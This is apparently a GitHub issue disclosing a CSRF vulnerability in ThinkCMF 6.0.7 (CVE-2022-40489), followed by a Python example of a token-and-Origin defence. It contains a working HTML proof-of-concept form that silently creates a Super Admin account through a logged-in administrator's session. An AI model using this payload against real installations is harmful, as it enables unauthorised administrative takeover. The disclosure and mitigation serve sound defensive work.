CVE-2022-40489: I found a CSRF that creates a Super Admin account. · Issue #736 · thinkcmf/thinkcmf

ThinkCMF version 6.0.7 is affected by a Cross-Site Request Forgery (CSRF) vulnerability that allows a Super Administrator account to be injected into the administrative users.


Hi,
I found a CSRF in ThinkCMF version 6.0.7 that allows a remote user to add a Super Admin account by taking advantage of the session of an administrator who is logged into the system. Below are the steps to reproduce this issue.

<html>
  <body>
    <h1>CSRF - SuperAdmin User Creation</h1>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/admin/user/addpost.html" method="POST">
      <input type="hidden" name="user_login" value="SuperAdmin" />
      <input type="hidden" name="user_pass" value="SuperAdmin999qweasd" />
      <input type="hidden" name="user_email" value="superadmin&#64;yopmail&#46;com" />
      <input type="hidden" name="role_id&#91;&#93;" value="2" />
      <input type="hidden" name="role_id&#91;&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      //document.forms[0].submit();
    </script>
  </body>
</html>

Fig. 1: Vulnerable page

Fig. 2: CSRF Payload

Fig. 3: CSRF Payload Executed

Fig. 4: Super Admin account added

Fig. 5: Super Admin logged in
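The root cause is that the user-creation endpoint trusts the session cookie alone, which the browser attaches to a cross-site form POST just as it does to a same-site one. The standard fix is a per-session synchronizer token that the legitimate admin form carries and an attacker's page cannot read, with an Origin check as a second layer. The block below is an added example in Python, not ThinkCMF's own code (which is PHP): a minimal handler for the `/admin/user/addpost.html` POST that applies such a check, exercised against a request constructed to mirror the PoC form above. The `Session` and `Request` classes, `SITE_ORIGIN`, the `_csrf_token` field name and the `attacker.example` origin are all assumptions made for the example.

```python
# Added example (not ThinkCMF's code): synchronizer-token CSRF check for a
# state-changing admin endpoint, run against a request modelled on the PoC form.
# Session and request objects are constructed stand-ins for a web framework's.
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

# Origin the admin UI is served from (assumed; matches the PoC's target host).
SITE_ORIGIN = "http://localhost"
TOKEN_FIELD = "_csrf_token"  # hypothetical hidden-field name


@dataclass
class Session:
    """Server-side session; the token is minted once per login and only ever rendered into same-site pages."""
    user_id: int
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    path: str
    headers: dict
    form: dict
    session: Optional[Session]  # resolved from the session cookie, which the browser attaches automatically


def csrf_hidden_input(session: Session) -> str:
    """Markup the legitimate admin form embeds so the token rides along with the POST."""
    return f'<input type="hidden" name="{TOKEN_FIELD}" value="{session.csrf_token}" />'


def check_csrf(req: Request) -> tuple:
    """Return (allowed, reason). Only state-changing methods are gated."""
    if req.method in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"
    if req.session is None:
        return False, "no authenticated session"
    # Defence in depth: browsers set Origin on cross-site form POSTs (to the
    # attacker page's origin, or "null"), so a mismatch is an early reject.
    origin = req.headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False, f"cross-site Origin {origin!r}"
    # Primary control: the submitted token must equal the one bound to this
    # session. The cookie is sent automatically; the token is not.
    token = req.form.get(TOKEN_FIELD) or req.headers.get("X-CSRF-Token")
    if not token or not hmac.compare_digest(token, req.session.csrf_token):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def add_admin_user(req: Request, users: list) -> tuple:
    """Handler for the user-creation POST; appends to `users` only when the check passes."""
    allowed, reason = check_csrf(req)
    if not allowed:
        return 403, reason
    users.append({
        "user_login": req.form["user_login"],
        "user_email": req.form["user_email"],
        "role_ids": req.form.get("role_id[]", []),
    })
    return 201, "user created"


def forged_request(victim: Session) -> Request:
    """Constructed: what the PoC page produces. The victim's session rides along,
    but there is no token and the Origin is the attacker page's (assumed origin)."""
    return Request(
        method="POST", path="/admin/user/addpost.html",
        headers={"Origin": "http://attacker.example"},
        form={"user_login": "SuperAdmin", "user_pass": "SuperAdmin999qweasd",
              "user_email": "superadmin@yopmail.com", "role_id[]": ["2", "1"]},
        session=victim,
    )


def legitimate_request(admin: Session) -> Request:
    """Constructed: a POST from the real admin form, carrying the session-bound token."""
    return Request(
        method="POST", path="/admin/user/addpost.html",
        headers={"Origin": SITE_ORIGIN},
        form={"user_login": "alice", "user_pass": "x", "user_email": "alice@example.invalid",
              "role_id[]": ["2"], TOKEN_FIELD: admin.csrf_token},
        session=admin,
    )


if __name__ == "__main__":
    admin = Session(user_id=1)
    users: list = []
    print(add_admin_user(forged_request(admin), users))      # (403, "cross-site Origin 'http://attacker.example'")
    print(add_admin_user(legitimate_request(admin), users))  # (201, 'user created')
    print(users)
```

Marking the session cookie `SameSite=Lax` or `Strict` is a complementary layer: the browser then withholds the cookie from a cross-site form POST altogether, so the forged request arrives unauthenticated. The token remains the control that does not depend on browser behaviour, which is why `check_csrf` still rejects the forged request when the `Origin` header is absent.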
